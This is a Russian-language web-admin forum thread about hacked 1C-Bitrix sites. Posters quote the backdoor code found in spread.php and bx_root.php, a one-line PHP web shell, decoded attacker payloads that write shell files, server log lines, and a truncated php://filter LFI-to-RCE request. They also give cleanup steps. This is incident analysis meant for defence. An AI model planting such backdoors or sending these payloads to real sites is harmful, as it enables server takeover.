Форум

[QUOTE] написал:
[QUOTE] написал:
ребят, ImunifyAV прислал отчёт что заражено 5 файлов на сайте, но при этом всё работает. Это вирусы или нет? Меня смущает дата внесения изменений аж 5 лет назад....[/QUOTE]
по дате спасибо за ответ, так это вирусы или нет? никакой информации не нашёл... и достаточно ли будет переписать эти файлы из бэкапа сайта и сразу же установить все обновления платформы битрикс?[/QUOTE]
Ну как это не нашли информацию? Все есть в этой теме и по несколько раз.

1 и 4 файлы удалить. 2 и 3 править. Также еще поправить уязвимые файлы или обновиться. Иначе ситуация повторится.

[QUOTE] написал:
Коллеги, добрый день
Тоже несколько сайтов клиентов были взломаны. По цепочке логов вроде получилось отследить, что через /bitrix/tools/html_editor_action.php и /bitrix/tools/spread.php
Подскажите, если я поставил пароль через .htaccess и .htpasswd на папку /bitrix/tools/, ниче для клиентов не должно сломаться?) Или не рекомендуется так делать?[/QUOTE]
1. spread.php - удалить.
2. В html_editor_action.php в начале прописать
[CODE]if(!empty($_POST)) die();[/CODE]3. Обновиться

Внимательно перечитал всю тему. Большое спасибо авторам постов, вся информация о том как ломают и что делать здесь есть. Сведу все еще раз для таких как я - впервые увидевших 1С Битрикс.  Сейчас есть 2 основные уязвимости для необновленных Битриксов. Это vote и html_editor_action. Пока не обновитесь, удалите найденные бэкдоры ( spread.php, bx_root.php, агенты и т.д. ) и поставьте заглушки в файлы:
/bitrix/tools/html_editor_action.php
/bitrix/tools/vote/uf.php

Приводит ли к взлому найденная мной последовательность в логах php://filter/convert.iconv.UTF8.CSISO2022KR  выясню позже. Может это действительно был какой-то запрос не для Битрикса.

[QUOTE] написал:
На наши серверы стали постить не на главную страницу, а на /bitrix/tools/spread.php.
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124  "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gex
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 " "Mozilla/5.0 (Windows NT x
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124  "Mozilla/5.0 (Windows NTx
m185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124  "Mozilla/5.0 (Windows NT

Предварительно заблочили весь ASN  [URL=https://asn.ipinfo.app/AS210644]https://asn.ipinfo.app/AS210644[/URL] провайдера aeza, заметили что оттуда оосновная масса вредоносных запросов поступает. Блокировали через правила в nginx (через include запрещающих правил типа [URL=https://asn.ipinfo.app/api/text/nginx/AS210644]https://asn.ipinfo.app/api/text/nginx/AS210644[/URL] ). Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Знаю, что костыль и что это не решение проблемы, но пока так..[/QUOTE]
Загляните в spread.php. Найдете такой код:
[CODE]if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"]))
{
$arState = array();
parse_str(base64_decode($_REQUEST["state"]), $arState);

echo $arState[0]($arState[1],$arState[2]);
die();
}

[/CODE]Методика та же что и в bx_root - Вызов любой функции с 2-мя аргументами пришедшими из интернета. Удалите или закомментриуйте его. Это тоже следствие. Причины пока ищу.

[QUOTE] написал:
[URL=/community/webdev/user/7086178/]vvv476[/URL], у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?

запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость
если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...

для проверки осталось только реализовать уязвимость и попробовать на своём сайте  

сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы[/QUOTE]
Это не проверочные запросы, поверьте. Код который он несет[CODE]<?php system($_POST["a"]); ?>
[/CODE]позволяет делать что угодно. Факт его удачного исполнения подтвержден кодом 200 сервера. К сожалению я не перехватил что именно было в параметре POST "a" того запроса, но характер последующих действий показал что после него началась эксплуатация сервера через bx_root.php про которую я писал выше. Тем, у кого дрянь вылезает после двух часов от бэкапа. Читайте логи веб-сервера. Фильтруйте, анализируйте. Если не найдете сами, пришлите мне.

Разбор того как работает взлом через POST к главной странице.

Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это:[CODE]<?
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>
[/CODE]Видимо по архитектуре Битрикса файл bx_root.php будет задействован при любом запросе. По крайне мере при запросе в корень точно.
Далее, атакующий в любой удобный момент времени посылает POST запрос примерно следующего содержимого:[CODE]'BX_STAT' => '303q6669293......o7q7q3s3r'
[/CODE]В bx_root.php он расшифруется в следующее:[CODE]0=file_put_contents&1=a0194226a99a.php&2=<?=409723*20;if(md5($_COOKIE[d])=="....?>
[/CODE] или в это[CODE]0=file_put_contents&1=bitrix/admin/ea20360ee090.php&2=<?=409723*20;if(md5($_COOKIE[d])=="....?>
[/CODE]или даже в это:[CODE]0=system&1=echo PD89N.....DA5NzI1lIl0pO319Pz4=|base64 -d| tee 5b186f810c33.php
[/CODE]parse_str заполнит 3 элемента массива $bx_stat, а потом будет вызвана функция с 2-мя аргументами $bx_stat[0]( $bx_stat[1], $bx_stat[2] )
и чаще всего это будет file_put_contents( virus_name, virus_body )

В логах веб-сервера это будет выглядеть как

"GET / HTTP/1.1" 200 3557 "-" ""
"POST / HTTP/1.1" 200 123 "-" ""
"GET /5b186f810c33.php HTTP/1.1" 200 3189 "" ""

Первый запрос GET к корню, потом экплойт через POST. Спустя несколько секунд проверка шелла GET /5b186f810c33.php
Как лечить? Удалить в bx_root.php добавленный код if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")


Но это все следствия! Как и множество других "страшнозакодированных" скриптов и .htaccess'ов которые здесь постили.
Причина, в моем случае точно, в другом. Вот с чего все начиналось: [CODE]POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.....
[/CODE]У Битрикса где-то внутри стоит что-то вроде include($_POST). Это и есть уязвимость LFI2RCE via PHP Filters!
Весь этот запрос ( он у меня есть ) путем манипуляций кодировок превращается в следующий код:[CODE]<?php system($_POST["a"]); ?>
[/CODE]соответственно будет произведен запуск любой команды из POST параметра 'a'.
Ключевое слово для поиска в логах CSISO2022KR - это обозначение корейской кодировки, без нее ничего не работает.
Почему так - сказано в статье [URL=https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html]https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html[/URL]

Как лечить? Пока поставить такую заглушку в /products/index.php
if($_SERVER['REQUEST_METHOD']=='POST') die();

Или глобально [URL=https://www.php.net/manual/en/function.stream-wrapper-unregister.php]stream_wrapper_unregister[/URL]('php')

Искать где находиться уязвимый код include($_POST) буду дальше.

Все полные логи и коды запросов имеются, могу выслать желающим